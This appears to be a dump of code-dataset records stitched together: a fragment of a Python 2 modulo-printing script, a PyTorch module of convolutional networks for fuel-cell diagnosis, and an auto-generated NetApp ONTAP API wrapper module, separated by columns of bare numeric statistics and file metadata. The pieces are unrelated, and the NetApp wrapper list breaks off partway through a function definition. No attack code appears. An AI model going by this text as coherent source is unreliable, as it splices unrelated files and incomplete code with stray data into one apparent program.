print "-6 % 10 =", -6 % 10
print "-10 % 10 =", -10 % 10
print "-14 % 10 =", -14 % 10
print "3.6 % 10 =", 3.6 % 10
print "-3.6 % 10 =", -3.6 % 10
print "35.9 % 10 =", 35.9 % 10
print "-35.9 % 10 =", -35.9 % 10
print "104 % 10 =", 104 % 10
print "-104 % 10 =", -104 % 10
# Same operand grid with a negative divisor.
print "0 % -10 =", 0 % -10
print "3 % -10 =", 3 % -10
print "6 % -10 =", 6 % -10
print "10 % -10 =", 10 % -10
print "14 % -10 =", 14 % -10
print "-3 % -10 =", -3 % -10
print "-6 % -10 =", -6 % -10
print "-10 % -10 =", -10 % -10
print "-14 % -10 =", -14 % -10
print "3.6 % -10 =", 3.6 % -10
print "-3.6 % -10 =", -3.6 % -10
print "35.9 % -10 =", 35.9 % -10
print "-35.9 % -10 =", -35.9 % -10
print "104 % -10 =", 104 % -10
print "-104 % -10 =", -104 % -10
| 26.727273
| 34
| 0.437642
| 166
| 882
| 2.325301
| 0.054217
| 0.525907
| 0.165803
| 0.103627
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.36875
| 0.274376
| 882
| 32
| 35
| 27.5625
| 0.234375
| 0
| 0
| 0
| 0
| 0
| 0.346198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
45c40cbba7fbf4153cd88078872458c8be136c0d
| 2,071
|
py
|
Python
|
model.py
|
Shangwei-ZHOU/Fuel_Cell_Diagnosis
|
65aee8803dc0ef7e9cae54f104c5b5cca823d2b9
|
[
"MIT"
] | null | null | null |
model.py
|
Shangwei-ZHOU/Fuel_Cell_Diagnosis
|
65aee8803dc0ef7e9cae54f104c5b5cca823d2b9
|
[
"MIT"
] | null | null | null |
model.py
|
Shangwei-ZHOU/Fuel_Cell_Diagnosis
|
65aee8803dc0ef7e9cae54f104c5b5cca823d2b9
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
# NOTE(review): not referenced by the classes below — confirm external
# users of this constant before removing it.
input_number=100
class Fuel_Cell_Net_16800(nn.Module):
def __init__(self):
super(Fuel_Cell_Net_16800,self).__init__()
self.conv1 = nn.Conv1d(1, 64, 100, 10)
self.pool1 = nn.MaxPool1d(3, 2)
self.conv2 = nn.Conv1d(64, 32, 5, 10)
self.pool2 = nn.MaxPool1d(2, 2)
self.fc1 = nn.Linear(32 * 42, 512)
self.fc2 = nn.Linear(512, 64)
self.fc3 = nn.Linear(64, 3)
def forward(self,x):
x = F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x = self.pool2(x)
x = x.view(-1, 32 * 42)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class Fuel_Cell_Net_40000(nn.Module):
def __init__(self):
super(Fuel_Cell_Net_40000,self).__init__()
self.conv1=nn.Conv1d(1,64,100,10)
self.pool1 = nn.MaxPool1d(3, 2)
self.conv2 = nn.Conv1d(64, 32, 5,10)
self.pool2=nn.MaxPool1d(2,2)
self.fc1=nn.Linear(32*100,512)
self.fc2=nn.Linear(512,64)
self.fc3 = nn.Linear(64, 3)
def forward(self,x):
x=F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x=self.pool2(x)
x=x.view(-1,32*100)
x=F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x=self.fc3(x)
return x
class Fuel_Cell_Net_10001(nn.Module):
def __init__(self):
super(Fuel_Cell_Net_10001,self).__init__()
self.conv1=nn.Conv1d(1,32,101,10)
self.pool1 = nn.MaxPool1d(3, 2)
self.conv2 = nn.Conv1d(32, 16, 5,10)
self.pool2=nn.MaxPool1d(2,2)
self.fc1=nn.Linear(16*25,256)
self.fc2=nn.Linear(256,64)
self.fc3 = nn.Linear(64, 3)
def forward(self,x):
x=F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x=self.pool2(x)
x=x.view(-1,16*25)
x=F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x=self.fc3(x)
return x
| 30.910448
| 50
| 0.550459
| 350
| 2,071
| 3.134286
| 0.14
| 0.043756
| 0.065634
| 0.109389
| 0.862352
| 0.862352
| 0.862352
| 0.838651
| 0.838651
| 0.742935
| 0
| 0.139472
| 0.286818
| 2,071
| 66
| 51
| 31.378788
| 0.60325
| 0
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.031746
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2fb50e5b4764ca01181bd15c01a6ba221e3d8926
| 181,311
|
py
|
Python
|
library/netapp-manageability-sdk-5.6/lib/python/NetApp/netapp_utils.py
|
Italux/python-mdszoning
|
e9126e5ee1f64105577db4afa74de33db88a80bf
|
[
"Apache-2.0"
] | null | null | null |
library/netapp-manageability-sdk-5.6/lib/python/NetApp/netapp_utils.py
|
Italux/python-mdszoning
|
e9126e5ee1f64105577db4afa74de33db88a80bf
|
[
"Apache-2.0"
] | 2
|
2022-03-23T20:22:14.000Z
|
2022-03-23T20:23:09.000Z
|
library/netapp-manageability-sdk-5.6/lib/python/NetApp/netapp_utils.py
|
italux/python-mdszoning
|
e9126e5ee1f64105577db4afa74de33db88a80bf
|
[
"Apache-2.0"
] | null | null | null |
############################################################################
# This module was auto-generated on Thu Oct 13 19:24:39 2016
# by using the 'system-api-list' api call from NetApp SDK for python.
# If you make changes to this module it will likely be broken the next time
# this file is auto-generated. If you choose to update this file anyway,
# please ensure that you have also updated the generate-api.py script
# to include your new changes.
#
# Also worth mentioning that some of the api calls may not work properly
# and that is because there is no way to easily auto-determine what api
# calls require additional arguments. If you find one that is broken,
# you may need to manually update this file but that is not recommended.
#
# The goal of this module is to make it easier to develop code since the
# original API requires you to know the exact API calls for interacting
# with your NetApp appliance. The other goal of this module is to ensure
# you can override it instead of modifying it directly if you find problems.
############################################################################
import sys
from NaElement import *
from NaServer import *
import xmltodict
import unicodedata
# Module-level connection handle, assigned by connect() below.
conn = None
# Default value handed to NaServer.set_timeout() in connect()
# (presumably seconds — confirm against the NetApp SDK docs).
timeout = 10
def connect(hostname, user, password, minor_version=1, major_version=21,
            transport='HTTP', port=80):
    """Create the module-global NaServer connection and return it.

    Backward-compatible generalization: transport and port were previously
    hard-coded to 'HTTP'/80; they are now keyword parameters with the same
    defaults, so existing callers behave identically while HTTPS or a
    non-default port can be requested.

    :param hostname: filer hostname or IP address
    :param user: admin user name
    :param password: admin password
    :param minor_version: ONTAPI minor version
    :param major_version: ONTAPI major version
    :param transport: transport type passed to set_transport_type()
    :param port: TCP port passed to set_port()
    :return: the configured NaServer instance (also stored in `conn`)
    """
    global conn
    conn = NaServer(hostname, minor_version, major_version)
    conn.set_server_type('filer')
    conn.set_transport_type(transport)
    conn.set_port(port)
    conn.set_style('LOGIN')
    conn.set_admin_user(user, password)
    # Apply the module-level default timeout.
    conn.set_timeout(timeout)
    return conn
# ---------------------------------------------------------------------------
# Auto-generated thin wrappers. Each function below maps a Python-friendly
# snake_case name onto the corresponding hyphenated ONTAP API call name and
# forwards its positional arguments to _invoke_api() (defined elsewhere in
# this module), returning the result unchanged. Do not hand-edit individual
# wrappers; regenerate the module instead (see the header above).
# ---------------------------------------------------------------------------
def action_test_key_optionality_defaultaction(*args):
    api_call = _invoke_api('action-test-key-optionality-defaultaction', *args)
    return api_call
def active_directory_account_get_iter(*args):
    api_call = _invoke_api('active-directory-account-get-iter', *args)
    return api_call
def aggr_add(*args):
    api_call = _invoke_api('aggr-add', *args)
    return api_call
def aggr_autobalance_aggregate_state_get_iter(*args):
    api_call = _invoke_api('aggr-autobalance-aggregate-state-get-iter', *args)
    return api_call
def aggr_autobalance_config_get(*args):
    api_call = _invoke_api('aggr-autobalance-config-get', *args)
    return api_call
def aggr_autobalance_config_modify(*args):
    api_call = _invoke_api('aggr-autobalance-config-modify', *args)
    return api_call
def aggr_autobalance_notification_get_iter(*args):
    api_call = _invoke_api('aggr-autobalance-notification-get-iter', *args)
    return api_call
def aggr_autobalance_volume_state_get_iter(*args):
    api_call = _invoke_api('aggr-autobalance-volume-state-get-iter', *args)
    return api_call
def aggr_check_spare_low(*args):
    api_call = _invoke_api('aggr-check-spare-low', *args)
    return api_call
def aggr_create(*args):
    api_call = _invoke_api('aggr-create', *args)
    return api_call
def aggr_destroy(*args):
    api_call = _invoke_api('aggr-destroy', *args)
    return api_call
def aggr_get_filer_info(*args):
    api_call = _invoke_api('aggr-get-filer-info', *args)
    return api_call
def aggr_get_iter(*args):
    api_call = _invoke_api('aggr-get-iter', *args)
    return api_call
def aggr_layout_recommendation_get_iter(*args):
    api_call = _invoke_api('aggr-layout-recommendation-get-iter', *args)
    return api_call
def aggr_mirror(*args):
    api_call = _invoke_api('aggr-mirror', *args)
    return api_call
def aggr_modify_raid_type(*args):
    api_call = _invoke_api('aggr-modify-raid-type', *args)
    return api_call
def aggr_offline(*args):
    api_call = _invoke_api('aggr-offline', *args)
    return api_call
def aggr_online(*args):
    api_call = _invoke_api('aggr-online', *args)
    return api_call
def aggr_options_list_info(*args):
    api_call = _invoke_api('aggr-options-list-info', *args)
    return api_call
def aggr_relocation(*args):
    api_call = _invoke_api('aggr-relocation', *args)
    return api_call
def aggr_relocation_status(*args):
    api_call = _invoke_api('aggr-relocation-status', *args)
    return api_call
def aggr_remove_stale_record(*args):
    api_call = _invoke_api('aggr-remove-stale-record', *args)
    return api_call
def aggr_rename(*args):
    api_call = _invoke_api('aggr-rename', *args)
    return api_call
def aggr_restrict(*args):
    api_call = _invoke_api('aggr-restrict', *args)
    return api_call
def aggr_scrub_list_info(*args):
    api_call = _invoke_api('aggr-scrub-list-info', *args)
    return api_call
def aggr_scrub_resume(*args):
    api_call = _invoke_api('aggr-scrub-resume', *args)
    return api_call
def aggr_scrub_start(*args):
    api_call = _invoke_api('aggr-scrub-start', *args)
    return api_call
def aggr_scrub_stop(*args):
    api_call = _invoke_api('aggr-scrub-stop', *args)
    return api_call
def aggr_scrub_suspend(*args):
    api_call = _invoke_api('aggr-scrub-suspend', *args)
    return api_call
def aggr_set_option(*args):
    api_call = _invoke_api('aggr-set-option', *args)
    return api_call
def aggr_space_get_iter(*args):
    api_call = _invoke_api('aggr-space-get-iter', *args)
    return api_call
def aggr_spare_get_iter(*args):
    api_call = _invoke_api('aggr-spare-get-iter', *args)
    return api_call
def aggr_status_get_iter(*args):
    api_call = _invoke_api('aggr-status-get-iter', *args)
    return api_call
def aggr_verify_list_info(*args):
    api_call = _invoke_api('aggr-verify-list-info', *args)
    return api_call
def aggr_verify_resume(*args):
    api_call = _invoke_api('aggr-verify-resume', *args)
    return api_call
def aggr_verify_start(*args):
    api_call = _invoke_api('aggr-verify-start', *args)
    return api_call
def aggr_verify_stop(*args):
    api_call = _invoke_api('aggr-verify-stop', *args)
    return api_call
def aggr_verify_suspend(*args):
    api_call = _invoke_api('aggr-verify-suspend', *args)
    return api_call
def alternate_destroy_iter_1(*args):
    api_call = _invoke_api('alternate-destroy-iter-1', *args)
    return api_call
def alternate_destroy_iter_1_inout(*args):
    api_call = _invoke_api('alternate-destroy-iter-1-inout', *args)
    return api_call
def alternate_get_1(*args):
    api_call = _invoke_api('alternate-get-1', *args)
    return api_call
def alternate_get_1_inout(*args):
    api_call = _invoke_api('alternate-get-1-inout', *args)
    return api_call
def alternate_get_iter_1(*args):
    api_call = _invoke_api('alternate-get-iter-1', *args)
    return api_call
def alternate_get_iter_1_inout(*args):
    api_call = _invoke_api('alternate-get-iter-1-inout', *args)
    return api_call
def alternate_get_iter_2(*args):
    api_call = _invoke_api('alternate-get-iter-2', *args)
    return api_call
def alternate_get_iter_2_inout(*args):
    api_call = _invoke_api('alternate-get-iter-2-inout', *args)
    return api_call
def alternate_modify_iter(*args):
    api_call = _invoke_api('alternate-modify-iter', *args)
    return api_call
def alternate_modify_iter_inout(*args):
    api_call = _invoke_api('alternate-modify-iter-inout', *args)
    return api_call
def antivirus_modify(*args):
    api_call = _invoke_api('antivirus-modify', *args)
    return api_call
def audit_get(*args):
    api_call = _invoke_api('audit-get', *args)
    return api_call
def audit_modify(*args):
    api_call = _invoke_api('audit-modify', *args)
    return api_call
def autogenzapi_create(*args):
    api_call = _invoke_api('autogenzapi-create', *args)
    return api_call
def autogenzapi_destroy(*args):
    api_call = _invoke_api('autogenzapi-destroy', *args)
    return api_call
def autogenzapi_get_iter(*args):
    api_call = _invoke_api('autogenzapi-get-iter', *args)
    return api_call
def autogenzapi_modify(*args):
    api_call = _invoke_api('autogenzapi-modify', *args)
    return api_call
def autogenzapi2_get_iter(*args):
    api_call = _invoke_api('autogenzapi2-get-iter', *args)
    return api_call
def autogenzapi3_create(*args):
    api_call = _invoke_api('autogenzapi3-create', *args)
    return api_call
def autogenzapi3_destroy(*args):
    api_call = _invoke_api('autogenzapi3-destroy', *args)
    return api_call
def autogenzapi3_get_iter(*args):
    api_call = _invoke_api('autogenzapi3-get-iter', *args)
    return api_call
def autogenzapi3_method1(*args):
    api_call = _invoke_api('autogenzapi3-method1', *args)
    return api_call
def autogenzapi3_modify(*args):
    api_call = _invoke_api('autogenzapi3-modify', *args)
    return api_call
def autogenzapiaction_dummy_autozapi_action_cmd(*args):
    api_call = _invoke_api('autogenzapiaction-dummy-autozapi-action-cmd', *args)
    return api_call
def autosupport_budget_get(*args):
    api_call = _invoke_api('autosupport-budget-get', *args)
    return api_call
def autosupport_budget_get_iter(*args):
    api_call = _invoke_api('autosupport-budget-get-iter', *args)
    return api_call
def autosupport_budget_get_total_records(*args):
    api_call = _invoke_api('autosupport-budget-get-total-records', *args)
    return api_call
def autosupport_budget_modify(*args):
    api_call = _invoke_api('autosupport-budget-modify', *args)
    return api_call
def autosupport_check_connectivity(*args):
    api_call = _invoke_api('autosupport-check-connectivity', *args)
    return api_call
def autosupport_check_connectivity_iter(*args):
    api_call = _invoke_api('autosupport-check-connectivity-iter', *args)
    return api_call
def autosupport_check_iter(*args):
    api_call = _invoke_api('autosupport-check-iter', *args)
    return api_call
def autosupport_compliant_get(*args):
    api_call = _invoke_api('autosupport-compliant-get', *args)
    return api_call
def autosupport_compliant_get_iter(*args):
    api_call = _invoke_api('autosupport-compliant-get-iter', *args)
    return api_call
def autosupport_compliant_get_total_records(*args):
    api_call = _invoke_api('autosupport-compliant-get-total-records', *args)
    return api_call
def autosupport_config_get(*args):
    api_call = _invoke_api('autosupport-config-get', *args)
    return api_call
def autosupport_config_get_iter(*args):
    api_call = _invoke_api('autosupport-config-get-iter', *args)
    return api_call
def autosupport_config_get_total_records(*args):
    api_call = _invoke_api('autosupport-config-get-total-records', *args)
    return api_call
def autosupport_config_modify(*args):
    api_call = _invoke_api('autosupport-config-modify', *args)
    return api_call
def autosupport_destinations_get(*args):
    api_call = _invoke_api('autosupport-destinations-get', *args)
    return api_call
def autosupport_destinations_get_iter(*args):
    api_call = _invoke_api('autosupport-destinations-get-iter', *args)
    return api_call
def autosupport_destinations_get_total_records(*args):
    api_call = _invoke_api('autosupport-destinations-get-total-records', *args)
    return api_call
def autosupport_download_get(*args):
    api_call = _invoke_api('autosupport-download-get', *args)
    return api_call
def autosupport_download_get_iter(*args):
    api_call = _invoke_api('autosupport-download-get-iter', *args)
    return api_call
def autosupport_history_cancel(*args):
    api_call = _invoke_api('autosupport-history-cancel', *args)
    return api_call
def autosupport_history_get(*args):
    api_call = _invoke_api('autosupport-history-get', *args)
    return api_call
def autosupport_history_get_iter(*args):
    api_call = _invoke_api('autosupport-history-get-iter', *args)
    return api_call
def autosupport_history_get_total_records(*args):
api_call = _invoke_api('autosupport-history-get-total-records', *args)
return api_call
def autosupport_history_retransmit(*args):
api_call = _invoke_api('autosupport-history-retransmit', *args)
return api_call
def autosupport_invoke(*args):
api_call = _invoke_api('autosupport-invoke', *args)
return api_call
def autosupport_invoke_core_upload(*args):
api_call = _invoke_api('autosupport-invoke-core-upload', *args)
return api_call
def autosupport_invoke_diagnostic(*args):
api_call = _invoke_api('autosupport-invoke-diagnostic', *args)
return api_call
def autosupport_invoke_performance_archive(*args):
api_call = _invoke_api('autosupport-invoke-performance-archive', *args)
return api_call
def autosupport_invoke_splog(*args):
api_call = _invoke_api('autosupport-invoke-splog', *args)
return api_call
def autosupport_manifest_get_iter(*args):
api_call = _invoke_api('autosupport-manifest-get-iter', *args)
return api_call
def autosupport_manifest_get_total_records(*args):
api_call = _invoke_api('autosupport-manifest-get-total-records', *args)
return api_call
def autosupport_trigger_get(*args):
api_call = _invoke_api('autosupport-trigger-get', *args)
return api_call
def autosupport_trigger_get_iter(*args):
api_call = _invoke_api('autosupport-trigger-get-iter', *args)
return api_call
def autosupport_trigger_get_total_records(*args):
api_call = _invoke_api('autosupport-trigger-get-total-records', *args)
return api_call
def autosupport_trigger_modify(*args):
api_call = _invoke_api('autosupport-trigger-modify', *args)
return api_call
# Generated thin wrappers for the 'autozapiview' and antivirus ('av-*') API
# families; each forwards its positional arguments unchanged to _invoke_api.
def autozapiview_get_iter(*args):
    return _invoke_api('autozapiview-get-iter', *args)
def av_get_engine_info(*args):
    return _invoke_api('av-get-engine-info', *args)
def av_get_engine_options(*args):
    return _invoke_api('av-get-engine-options', *args)
def av_get_log(*args):
    return _invoke_api('av-get-log', *args)
def av_get_remedy_info(*args):
    return _invoke_api('av-get-remedy-info', *args)
def av_get_version_info(*args):
    return _invoke_api('av-get-version-info', *args)
def av_log_iter(*args):
    return _invoke_api('av-log-iter', *args)
def av_on_access_policy_get_iter(*args):
    return _invoke_api('av-on-access-policy-get-iter', *args)
def av_on_demand_command_abort(*args):
    return _invoke_api('av-on-demand-command-abort', *args)
def av_on_demand_command_run(*args):
    return _invoke_api('av-on-demand-command-run', *args)
def av_on_demand_command_scan_cluster_create(*args):
    return _invoke_api('av-on-demand-command-scan-cluster-create', *args)
def av_on_demand_command_scan_cluster_delete(*args):
    return _invoke_api('av-on-demand-command-scan-cluster-delete', *args)
def av_on_demand_command_scan_cluster_get(*args):
    return _invoke_api('av-on-demand-command-scan-cluster-get', *args)
def av_on_demand_command_scan_cluster_get_iter(*args):
    return _invoke_api('av-on-demand-command-scan-cluster-get-iter', *args)
def av_on_demand_command_scan_cluster_modify(*args):
    return _invoke_api('av-on-demand-command-scan-cluster-modify', *args)
def av_on_demand_command_scan_dir_get_iter(*args):
    return _invoke_api('av-on-demand-command-scan-dir-get-iter', *args)
def av_on_demand_command_scan_file_get_iter(*args):
    return _invoke_api('av-on-demand-command-scan-file-get-iter', *args)
def av_on_demand_command_scan_vserver_get_iter(*args):
    return _invoke_api('av-on-demand-command-scan-vserver-get-iter', *args)
def av_on_demand_command_schedule(*args):
    return _invoke_api('av-on-demand-command-schedule', *args)
def av_on_demand_command_unschedule(*args):
    return _invoke_api('av-on-demand-command-unschedule', *args)
def av_on_demand_job_get_iter(*args):
    return _invoke_api('av-on-demand-job-get-iter', *args)
def av_on_demand_report_get_iter(*args):
    return _invoke_api('av-on-demand-report-get-iter', *args)
def av_on_demand_report_print(*args):
    return _invoke_api('av-on-demand-report-print', *args)
def av_on_demand_report_upload(*args):
    return _invoke_api('av-on-demand-report-upload', *args)
def av_set_engine_info(*args):
    return _invoke_api('av-set-engine-info', *args)
def av_set_engine_options(*args):
    return _invoke_api('av-set-engine-options', *args)
def av_set_log(*args):
    return _invoke_api('av-set-log', *args)
def av_set_remedy_info(*args):
    return _invoke_api('av-set-remedy-info', *args)
def av_set_version_info(*args):
    return _invoke_api('av-set-version-info', *args)
def av_start_update(*args):
    return _invoke_api('av-start-update', *args)
# Generated thin wrappers for the 'capability-*' API family; each forwards
# its positional arguments unchanged to _invoke_api.
def capability_can_be_enabled(*args):
    return _invoke_api('capability-can-be-enabled', *args)
def capability_can_be_enabled_shim(*args):
    return _invoke_api('capability-can-be-enabled-shim', *args)
def capability_can_boot_shim(*args):
    return _invoke_api('capability-can-boot-shim', *args)
def capability_can_join_shim(*args):
    return _invoke_api('capability-can-join-shim', *args)
def capability_disable(*args):
    return _invoke_api('capability-disable', *args)
def capability_downgrade_commit_shim(*args):
    return _invoke_api('capability-downgrade-commit-shim', *args)
def capability_downgrade_prepare_shim(*args):
    return _invoke_api('capability-downgrade-prepare-shim', *args)
def capability_enable(*args):
    return _invoke_api('capability-enable', *args)
def capability_get(*args):
    return _invoke_api('capability-get', *args)
def capability_get_cluster_set(*args):
    return _invoke_api('capability-get-cluster-set', *args)
def capability_get_iter(*args):
    return _invoke_api('capability-get-iter', *args)
def capability_is_enabled(*args):
    return _invoke_api('capability-is-enabled', *args)
def capability_is_enabled_during_downgrade_shim(*args):
    return _invoke_api('capability-is-enabled-during-downgrade-shim', *args)
def capability_is_local_node_enable_ready(*args):
    return _invoke_api('capability-is-local-node-enable-ready', *args)
def capability_load_manifest_shim(*args):
    return _invoke_api('capability-load-manifest-shim', *args)
def capability_mark_local_node_enable_ready(*args):
    return _invoke_api('capability-mark-local-node-enable-ready', *args)
def capability_node_disable(*args):
    return _invoke_api('capability-node-disable', *args)
def capability_node_enable(*args):
    return _invoke_api('capability-node-enable', *args)
def capability_node_has_capability(*args):
    return _invoke_api('capability-node-has-capability', *args)
def capability_node_is_enabled(*args):
    return _invoke_api('capability-node-is-enabled', *args)
def capability_recommend_release_shim(*args):
    return _invoke_api('capability-recommend-release-shim', *args)
def capability_replicate_manifest_for_join_shim(*args):
    return _invoke_api('capability-replicate-manifest-for-join-shim', *args)
def capability_software_update_check_shim(*args):
    return _invoke_api('capability-software-update-check-shim', *args)
# Generated thin wrappers for the 'cf-*' API family; each forwards its
# positional arguments unchanged to _invoke_api.
def cf_aggregate_giveback_status(*args):
    return _invoke_api('cf-aggregate-giveback-status', *args)
def cf_force_takeover(*args):
    return _invoke_api('cf-force-takeover', *args)
def cf_get_iter(*args):
    return _invoke_api('cf-get-iter', *args)
def cf_get_partner(*args):
    return _invoke_api('cf-get-partner', *args)
def cf_giveback(*args):
    return _invoke_api('cf-giveback', *args)
def cf_hwassist_stats(*args):
    return _invoke_api('cf-hwassist-stats', *args)
def cf_hwassist_stats_clear(*args):
    return _invoke_api('cf-hwassist-stats-clear', *args)
def cf_hwassist_status(*args):
    return _invoke_api('cf-hwassist-status', *args)
def cf_hwassist_test(*args):
    return _invoke_api('cf-hwassist-test', *args)
def cf_mode_set(*args):
    return _invoke_api('cf-mode-set', *args)
def cf_modify_iter(*args):
    return _invoke_api('cf-modify-iter', *args)
def cf_service_disable(*args):
    return _invoke_api('cf-service-disable', *args)
def cf_service_enable(*args):
    return _invoke_api('cf-service-enable', *args)
def cf_status(*args):
    return _invoke_api('cf-status', *args)
def cf_takeover(*args):
    return _invoke_api('cf-takeover', *args)
def cf_takeover_status(*args):
    return _invoke_api('cf-takeover-status', *args)
# Generated thin wrappers for the 'cifs-*' API family; each forwards its
# positional arguments unchanged to _invoke_api.
def cifs_branchcache_get_iter(*args):
    return _invoke_api('cifs-branchcache-get-iter', *args)
def cifs_character_mapping_get_iter(*args):
    return _invoke_api('cifs-character-mapping-get-iter', *args)
def cifs_domain_discovered_servers_get_iter(*args):
    return _invoke_api('cifs-domain-discovered-servers-get-iter', *args)
def cifs_domain_name_mapping_search_get_iter(*args):
    return _invoke_api('cifs-domain-name-mapping-search-get-iter', *args)
def cifs_domain_password_schedule_get_iter(*args):
    return _invoke_api('cifs-domain-password-schedule-get-iter', *args)
def cifs_domain_preferred_dc_get_iter(*args):
    return _invoke_api('cifs-domain-preferred-dc-get-iter', *args)
def cifs_domain_trusts_get_iter(*args):
    return _invoke_api('cifs-domain-trusts-get-iter', *args)
def cifs_home_directory_get_iter(*args):
    return _invoke_api('cifs-home-directory-get-iter', *args)
def cifs_home_directory_search_path_get_iter(*args):
    return _invoke_api('cifs-home-directory-search-path-get-iter', *args)
def cifs_local_group_get_iter(*args):
    return _invoke_api('cifs-local-group-get-iter', *args)
def cifs_local_group_members_get_iter(*args):
    return _invoke_api('cifs-local-group-members-get-iter', *args)
def cifs_local_user_get_iter(*args):
    return _invoke_api('cifs-local-user-get-iter', *args)
def cifs_local_user_membership_get_iter(*args):
    return _invoke_api('cifs-local-user-membership-get-iter', *args)
def cifs_nbtstat_get_iter(*args):
    return _invoke_api('cifs-nbtstat-get-iter', *args)
def cifs_options_get_iter(*args):
    return _invoke_api('cifs-options-get-iter', *args)
def cifs_privilege_get_iter(*args):
    return _invoke_api('cifs-privilege-get-iter', *args)
def cifs_security_get_iter(*args):
    return _invoke_api('cifs-security-get-iter', *args)
def cifs_server_get_iter(*args):
    return _invoke_api('cifs-server-get-iter', *args)
def cifs_session_file_get_iter(*args):
    return _invoke_api('cifs-session-file-get-iter', *args)
def cifs_session_get_iter(*args):
    return _invoke_api('cifs-session-get-iter', *args)
def cifs_shadowcopy_add_files(*args):
    return _invoke_api('cifs-shadowcopy-add-files', *args)
def cifs_shadowcopy_ems_get_iter(*args):
    return _invoke_api('cifs-shadowcopy-ems-get-iter', *args)
def cifs_shadowcopy_keep_snapshot(*args):
    return _invoke_api('cifs-shadowcopy-keep-snapshot', *args)
def cifs_shadowcopy_restore_dir(*args):
    return _invoke_api('cifs-shadowcopy-restore-dir', *args)
def cifs_share_access_control_get_iter(*args):
    return _invoke_api('cifs-share-access-control-get-iter', *args)
def cifs_share_get_iter(*args):
    return _invoke_api('cifs-share-get-iter', *args)
def cifs_symlink_get_iter(*args):
    return _invoke_api('cifs-symlink-get-iter', *args)
# Generated thin wrappers for the 'clock-*' and 'clone-*' API families; each
# forwards its positional arguments unchanged to _invoke_api.
def clock_get_clock(*args):
    return _invoke_api('clock-get-clock', *args)
def clock_get_timezone(*args):
    return _invoke_api('clock-get-timezone', *args)
def clone_deletion_get_iter(*args):
    return _invoke_api('clone-deletion-get-iter', *args)
def clone_split_load_get_iter(*args):
    return _invoke_api('clone-split-load-get-iter', *args)
def clone_split_load_modify(*args):
    return _invoke_api('clone-split-load-modify', *args)
def clone_token_create(*args):
    return _invoke_api('clone-token-create', *args)
def clone_token_delete(*args):
    return _invoke_api('clone-token-delete', *args)
def clone_token_get(*args):
    return _invoke_api('clone-token-get', *args)
def clone_token_modify_expiry_limit(*args):
    return _invoke_api('clone-token-modify-expiry-limit', *args)
# Generated thin wrappers for the 'cluster-*' API family; each forwards its
# positional arguments unchanged to _invoke_api.
def cluster_application_record_create(*args):
    return _invoke_api('cluster-application-record-create', *args)
def cluster_application_record_delete(*args):
    return _invoke_api('cluster-application-record-delete', *args)
def cluster_application_record_get_iter(*args):
    return _invoke_api('cluster-application-record-get-iter', *args)
def cluster_application_record_modify(*args):
    return _invoke_api('cluster-application-record-modify', *args)
def cluster_contact_get(*args):
    return _invoke_api('cluster-contact-get', *args)
def cluster_contact_modify(*args):
    return _invoke_api('cluster-contact-modify', *args)
def cluster_create(*args):
    return _invoke_api('cluster-create', *args)
def cluster_create_join_progress_get(*args):
    return _invoke_api('cluster-create-join-progress-get', *args)
def cluster_ha_get(*args):
    return _invoke_api('cluster-ha-get', *args)
def cluster_ha_modify(*args):
    return _invoke_api('cluster-ha-modify', *args)
def cluster_identity_get(*args):
    return _invoke_api('cluster-identity-get', *args)
def cluster_identity_modify(*args):
    return _invoke_api('cluster-identity-modify', *args)
def cluster_image_get(*args):
    return _invoke_api('cluster-image-get', *args)
def cluster_image_get_download_progress(*args):
    return _invoke_api('cluster-image-get-download-progress', *args)
def cluster_image_get_iter(*args):
    return _invoke_api('cluster-image-get-iter', *args)
def cluster_image_node_update_progress_info(*args):
    return _invoke_api('cluster-image-node-update-progress-info', *args)
def cluster_image_package_delete(*args):
    return _invoke_api('cluster-image-package-delete', *args)
def cluster_image_package_download(*args):
    return _invoke_api('cluster-image-package-download', *args)
def cluster_image_package_download_abort(*args):
    return _invoke_api('cluster-image-package-download-abort', *args)
def cluster_image_package_local_get(*args):
    return _invoke_api('cluster-image-package-local-get', *args)
def cluster_image_package_local_get_iter(*args):
    return _invoke_api('cluster-image-package-local-get-iter', *args)
def cluster_image_update(*args):
    return _invoke_api('cluster-image-update', *args)
def cluster_image_update_cancel(*args):
    return _invoke_api('cluster-image-update-cancel', *args)
def cluster_image_update_history_get_iter(*args):
    return _invoke_api('cluster-image-update-history-get-iter', *args)
def cluster_image_update_log_get_iter(*args):
    return _invoke_api('cluster-image-update-log-get-iter', *args)
def cluster_image_update_pause(*args):
    return _invoke_api('cluster-image-update-pause', *args)
def cluster_image_update_progress_get_iter(*args):
    return _invoke_api('cluster-image-update-progress-get-iter', *args)
def cluster_image_update_progress_info(*args):
    return _invoke_api('cluster-image-update-progress-info', *args)
def cluster_image_update_resume(*args):
    return _invoke_api('cluster-image-update-resume', *args)
def cluster_image_validate(*args):
    return _invoke_api('cluster-image-validate', *args)
def cluster_join(*args):
    return _invoke_api('cluster-join', *args)
def cluster_log_forward_create(*args):
    return _invoke_api('cluster-log-forward-create', *args)
def cluster_log_forward_destroy(*args):
    return _invoke_api('cluster-log-forward-destroy', *args)
def cluster_log_forward_get(*args):
    return _invoke_api('cluster-log-forward-get', *args)
def cluster_log_forward_get_iter(*args):
